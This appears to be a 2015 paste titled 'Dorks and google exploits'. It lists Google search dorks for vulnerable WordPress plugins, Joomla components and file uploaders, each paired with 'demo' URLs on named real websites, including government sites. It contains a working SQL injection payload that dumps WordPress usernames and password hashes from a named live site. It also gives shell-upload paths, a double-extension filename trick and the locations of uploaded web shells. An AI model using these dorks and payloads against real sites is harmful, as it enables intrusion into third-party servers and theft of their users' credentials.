Kyfx

Dorks and google exploits

Dec 20th, 2015
  1. intitle:Powered By phUploader
  2.  
  3. Dork: inurl:/editor/tmedit/popups
  4. Exploit Path : /editor/tmedit/popups/InsertFile/insert_file.php
  5.  
  6.  
  7. inurl:/upload.php intext:Image Upload
  8.  
  9.  
  10.  
  11. 1. Espacio Ecuador
  12. [ dork ]
  13. intext:"developed by Espacio Ecuador" inurl:id=
  14. [ demo ]
  15. http://www.mytripecuador.com/ecuador-hotels/hotel.php?id=25
  16. [ details ]
  17. http://cxsecurity.com/issue/WLB-2012110228
  18.  
  19. 2. Seventeen Design
  20. [ dork ]
  21. intext:"Producido por: Seventeen Design." inurl:id=
  22. [ demo ]
  23. http://www.monteavila.gob.ve/mae/detail_new.php?id=147'
  24. [ details ]
  25. http://cxsecurity.com/issue/WLB-2012110225
  26.  
  27. 3. Plugin Wordpress Newsletter
  28. [ dork ]
  29. allinurl:stnl_iframe.php?newsletter=
  30. [ demo ]
  31. http://preventcancernow.ca/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=7
  32.  
  33. 4. Plugin Wordpress Wp-Imagezoom
  34. [ dork ]
  35. allinurl:wp-imagezoom/zoom.php?id=
  36. [ demo ]
  37. http://asiasons.com/wp-content/plugins/wp-imagezoom/zoom.php?id=GnAaX
  38.  
  39. 5. Wordpress Daily Edition Mouss
  40. [ dork ]
  41. inurl:fiche-artiste.php?id=
  42. inurl:themes/dailyedition-mouss/fiche-artiste.php?id=
  43. [ demo ]
  44. http://hotnewrap.net/wp-content/themes/dailyedition-mouss/fiche-artiste.php?id=383
  45.  
  46. 6. Wp- Plugin "Plg_Novana"
  47. [ dork ]
  48. inurl:novana_detail.php?**id=
  49. [ exploit ]
  50. /wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=[sql]
  51. [ demo ]
  52. http://avenuepattaya.net/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=-35+union+select+1,2,3,4,5,6,7,8,9,group_concat%28user_login,user_pass%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users--
  53. [ detail ]
  54. http://1337day.com/exploit/19787
  55.  
  56. 7. Girl .php
  57. [ dork ]
  58. inurl:girl.php?id=
  59. [ demo ]
  60. http://www.btsfashionshow.com/girl.php?id=6
  61. http://www.aramis-london-escorts.com/girl.php?id=301
  62. http://www.pornescort.xxx/girl.php?id=68
  63.  
  64. 8. Like .php
  65. [ dork ]
  66. inurl:like.php?id= intext:LikeItNow Script © 2010
  67. [ demo ]
  68. http://neonapster.net23.net/like.php?id=34%27
  69.  
  70.  
  71. Tamper Data
  72.  
  73. 1. Joomla Component com_smartformer
  74. [ dork ]
  75. inurl:index.php?option=com_smartformer inurl:itemid= intext:Upload
  76. [ demo ]
  77. http://www.goodarch2u.com.my/index.php?option=com_smartformer&Itemid=439&lang=en
  78. http://www.finenge.com/en/index.php?option=com_smartformer&Itemid=90
  79. [ shell location ]
  80. site/components/com_smartformer/files/yournameshell.php
  81. [ details ]
  82. http://1337day.com/exploit/19825
  83.  
  84. 2. Plugin Wordpress Zarzadzanie Kontem (Ajax File Manager)
  85. [ dork ]
  86. inurl:"ajaxfilemanager.php?page=" intitle:ajax file manager
  87. [ demo ]
  88. http://www.madiunkab.go.id/qwerty/filemanager/ajaxfilemanager.php?page=3
  89. http://www.hacker-motor.com/javascript/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?page=5
  90.  
  91. 3. Wp- Plugin "tdo-mini-form"
  92. [ dork ]
  93. inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload
  94. [ link upload file ]
  95. site/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP;.jpg
  96. [ example ]
  97. wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP;.jpg
  98. [ demo ]
  99. http://www.tutufoundationusa.org/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
  100. [ details ]
  101. http://1337day.com/exploit/19776
  102.  
  103. 4. JQuery File Upload
  104. [ dork ]
  105. intitle:upload intext:Add files.. "Start upload" Cancel upload Delete
  106. [ vuln ]
  107. http://konceptsigngroup.com/jQuery-FileUpload/index.html
  108. [ demo ]
  109. http://konceptsigngroup.com/jQuery-FileUpload/server/php/thumbnails/anonymous%20muslim.jpg
  110.  
  111. 5. Upload Tiny Browser
  112. [new dork ]
  113. inurl:tinybrowser/upload.php
  114. intitle:Index of / intext:Parent Directory "tinybrowser/"
  115. inurl:/tinybrowser/ intitle:TinyBrowser :: ext:php
  116. inurl:tinybrowser/upload.php intext:Enviar Arquivos intitle:TinyBrowser :: Upload
  117. inurl:type=image& intext:Enviar Arquivos intitle:TinyBrowser :: Upload
  118. [ demo ]
  119. http://www.maspa.com.br/clientes/lj/admin/js/tiny_mce/plugins/tinybrowser/upload.php
  120. [ example ]
  121. http://www.maspa.com.br/uploads/images/_thumbs/_anonymous_muslims.jpg
  122. [ details ]
  123. http://1337day.com/exploit/19732
  124.  
  125. 6. Joomla File Upload "com_autostand"
  126. [dork ]
  127. inurl:index.php?option=** func=newItem intext:Select Image Add a Car
  128. inurl:index.php?option=** func=newItem intext:Select Image Publish Only available to admin
  129. inurl:index.php?option=com_autostand
  130. [ poc ]
  131. site/inurl:index.php?option=com_autostand&func=newItem
  132. [ demo ]
  133. http://www.karahan.be//index.php?option=com_autostand&func=newItem
  134.  
  135.  
  136. TAMPER DATA & SHELL UPLOAD
  137.  
  138. 1. Plugin Spot Light
  139. [ dork ]
  140. intitle:index of /../plugins/spotlightyour/monetize/ intext:Parent Directory "upload/"
  141. inurl:wp-content monetize/upload/ intext:Uploading Please wait ... Uploaded Successfully.
  142. inurl:wp-content/plugins/spotlightyour/
  143. [ exploit ]
  144. http://site/wp-content/plugins/spotlightyour/monetize/upload/
  145. [ shell access ]
  146. wp-content/uploads/[year]/[month]/[search your shell].php
  147. [ example ]
  148. http://pure-cashmere-pashmina-scarves.com/wp-content/plugins/spotlightyour/monetize/upload/